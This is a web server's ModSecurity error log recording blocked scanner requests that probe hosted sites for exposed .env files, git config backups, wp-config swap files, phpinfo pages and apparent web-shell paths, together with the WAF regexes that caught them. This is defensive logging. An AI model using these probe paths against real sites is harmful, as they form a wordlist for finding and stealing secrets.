[Tue May 26 15:25:03.297415 2026] [security2:error] [pid 707292:tid 707356] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/backend/.env"] [unique_id "ahVt99KAqlRPSIEFAut5mAAA4T8"]
[Tue May 26 15:25:03.304300 2026] [security2:error] [pid 707292:tid 707377] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.sevenstar.onesoft.in"] [uri "/*update.cgi*"] [unique_id "ahVt99KAqlRPSIEFAut5nQAA3lQ"]
[Tue May 26 15:25:03.445995 2026] [security2:error] [pid 707292:tid 707368] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.git/config.bak"] [unique_id "ahVt99KAqlRPSIEFAut5rgAA5ks"]
[Tue May 26 15:25:03.446613 2026] [security2:error] [pid 707292:tid 707380] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.git/config.old"] [unique_id "ahVt99KAqlRPSIEFAut5rAAA5lc"]
[Tue May 26 15:25:03.448616 2026] [security2:error] [pid 707292:tid 707379] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.git/config~"] [unique_id "ahVt99KAqlRPSIEFAut5rQAA5lY"]
[Tue May 26 15:25:03.769276 2026] [security2:error] [pid 707292:tid 707510] [client 20.29.64.60:3138] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVt99KAqlRPSIEFAut52gAAAN0"]
[Tue May 26 15:25:03.863737 2026] [security2:error] [pid 707292:tid 707530] [client 20.29.64.60:3145] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/bldgksrx.php"] [unique_id "ahVt99KAqlRPSIEFAut54AAAAPE"], referer: www.google.com
[Tue May 26 15:25:03.889603 2026] [security2:error] [pid 707292:tid 707323] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/.wp-config.php.swp"] [unique_id "ahVt99KAqlRPSIEFAut56wAAtR4"]
[Tue May 26 15:25:03.901568 2026] [autoindex:error] [pid 707292:tid 707414] [remote 195.178.110.199:59060] AH01276: Cannot serve directory /home2/onesomzc/public_html/www.sevenstar.onesoft.in/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:25:03.901867 2026] [security2:error] [pid 707292:tid 707306] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/ADMIN/.env"] [unique_id "ahVt99KAqlRPSIEFAut57gAAtQ0"]
[Tue May 26 15:25:03.943544 2026] [security2:error] [pid 707292:tid 707428] [client 172.202.92.73:46179] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.sbvschools.com"] [uri "/s.php"] [unique_id "ahVt99KAqlRPSIEFAut58gAAAIs"]
[Tue May 26 15:25:03.943669 2026] [security2:error] [pid 707292:tid 707428] [client 172.202.92.73:46179] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.sbvschools.com"] [uri "/s.php"] [unique_id "ahVt99KAqlRPSIEFAut58gAAAIs"]
[Tue May 26 15:25:03.999138 2026] [security2:error] [pid 707292:tid 707309] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/API/.env"] [unique_id "ahVt99KAqlRPSIEFAut59wAApBA"]
[Tue May 26 15:25:04.033416 2026] [security2:error] [pid 707292:tid 707316] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/APP/.env"] [unique_id "ahVt-NKAqlRPSIEFAut5_gAArxc"]
[Tue May 26 15:25:04.035644 2026] [security2:error] [pid 707292:tid 707315] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/Api/.env"] [unique_id "ahVt-NKAqlRPSIEFAut5_wAArxY"]
[Tue May 26 15:25:04.035986 2026] [security2:error] [pid 707292:tid 707314] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/BACKEND/.env"] [unique_id "ahVt-NKAqlRPSIEFAut6AQAArxU"]
[Tue May 26 15:25:04.036168 2026] [security2:error] [pid 707292:tid 707331] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/BACK/.env"] [unique_id "ahVt-NKAqlRPSIEFAut6AAAAryY"]
[Tue May 26 15:25:04.040866 2026] [security2:error] [pid 707292:tid 707307] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/BE/.env"] [unique_id "ahVt-NKAqlRPSIEFAut6AgAAtg4"]
[Tue May 26 15:25:04.048352 2026] [security2:error] [pid 707292:tid 707420] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/Be/.env"] [unique_id "ahVt-NKAqlRPSIEFAut6BQAA4H8"]
[Tue May 26 15:25:04.048435 2026] [security2:error] [pid 707292:tid 707326] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/Backend/.env"] [unique_id "ahVt-NKAqlRPSIEFAut6BAAA4CE"]
[Tue May 26 15:25:04.292326 2026] [security2:error] [pid 707292:tid 707375] [remote 216.73.217.110:30155] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/online.php"] [unique_id "ahVt-NKAqlRPSIEFAut6GQAAoFI"]
[Tue May 26 15:25:04.319987 2026] [security2:error] [pid 707292:tid 707528] [client 20.29.64.60:3146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVt-NKAqlRPSIEFAut6HQAAAO8"], referer: www.google.com
[Tue May 26 15:25:04.329539 2026] [security2:error] [pid 707292:tid 707333] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVt-NKAqlRPSIEFAut6JwAAvCg"]
[Tue May 26 15:25:04.385631 2026] [security2:error] [pid 707292:tid 707444] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt99KAqlRPSIEFAut58QAAAJs"]
[Tue May 26 15:25:04.440609 2026] [security2:error] [pid 707292:tid 707361] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/admin-app/.env"] [unique_id "ahVt-NKAqlRPSIEFAut6MgAA3EQ"]
[Tue May 26 15:25:04.478598 2026] [security2:error] [pid 707292:tid 707373] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/admin/phpinfo.php"] [unique_id "ahVt-NKAqlRPSIEFAut6PAAAwlA"]
[Tue May 26 15:25:04.487812 2026] [security2:error] [pid 707292:tid 707372] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/admin_phpinfo.php"] [unique_id "ahVt-NKAqlRPSIEFAut6PgAA508"]
[Tue May 26 15:25:04.586934 2026] [security2:error] [pid 707292:tid 707368] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/api-backend/.env"] [unique_id "ahVt-NKAqlRPSIEFAut6QgAA50s"]
[Tue May 26 15:25:04.621934 2026] [security2:error] [pid 707292:tid 707380] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/api-node/.env"] [unique_id "ahVt-NKAqlRPSIEFAut6QwAA51c"]
[Tue May 26 15:25:04.622098 2026] [security2:error] [pid 707292:tid 707364] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/api/.env"] [unique_id "ahVt-NKAqlRPSIEFAut6RQAA50c"]
[Tue May 26 15:25:04.731846 2026] [security2:error] [pid 707292:tid 707393] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/api/info.php"] [unique_id "ahVt-NKAqlRPSIEFAut6VgAA52Q"]
[Tue May 26 15:25:04.732184 2026] [security2:error] [pid 707292:tid 707381] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/administrator/.env"] [unique_id "ahVt-NKAqlRPSIEFAut6PwAA51g"]
[Tue May 26 15:25:04.771062 2026] [security2:error] [pid 707292:tid 707398] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/api/phpinfo.php"] [unique_id "ahVt-NKAqlRPSIEFAut6XAAAnWk"]
[Tue May 26 15:25:04.884084 2026] [security2:error] [pid 707292:tid 707406] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/apis/.env"] [unique_id "ahVt-NKAqlRPSIEFAut6ZwAAn3E"]
[Tue May 26 15:25:04.918394 2026] [security2:error] [pid 707292:tid 707402] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/app/.env"] [unique_id "ahVt-NKAqlRPSIEFAut6bgAAmm0"]
[Tue May 26 15:25:05.068871 2026] [security2:error] [pid 707292:tid 707330] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/application/.env"] [unique_id "ahVt-dKAqlRPSIEFAut6hAAAsyU"]
[Tue May 26 15:25:05.070599 2026] [security2:error] [pid 707292:tid 707309] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/apps/.env"] [unique_id "ahVt-dKAqlRPSIEFAut6hQAAsxA"]
[Tue May 26 15:25:05.364881 2026] [security2:error] [pid 707292:tid 707336] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/back-end/.env"] [unique_id "ahVt-dKAqlRPSIEFAut6rAAA7Cs"]
[Tue May 26 15:25:05.364945 2026] [security2:error] [pid 707292:tid 707340] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/back-api/.env"] [unique_id "ahVt-dKAqlRPSIEFAut6qwAA7C8"]
[Tue May 26 15:25:05.365137 2026] [security2:error] [pid 707292:tid 707337] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/back/.env"] [unique_id "ahVt-dKAqlRPSIEFAut6rQAA7Cw"]
[Tue May 26 15:25:05.365769 2026] [security2:error] [pid 707292:tid 707336] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/backend-api/.env"] [unique_id "ahVt-dKAqlRPSIEFAut6rgAA7Cs"]
[Tue May 26 15:25:05.367396 2026] [security2:error] [pid 707292:tid 707339] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/backend/.env"] [unique_id "ahVt-dKAqlRPSIEFAut6sAAA7C4"]
[Tue May 26 15:25:05.511530 2026] [security2:error] [pid 707292:tid 707346] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/be/.env"] [unique_id "ahVt-dKAqlRPSIEFAut6wQAAqTU"]
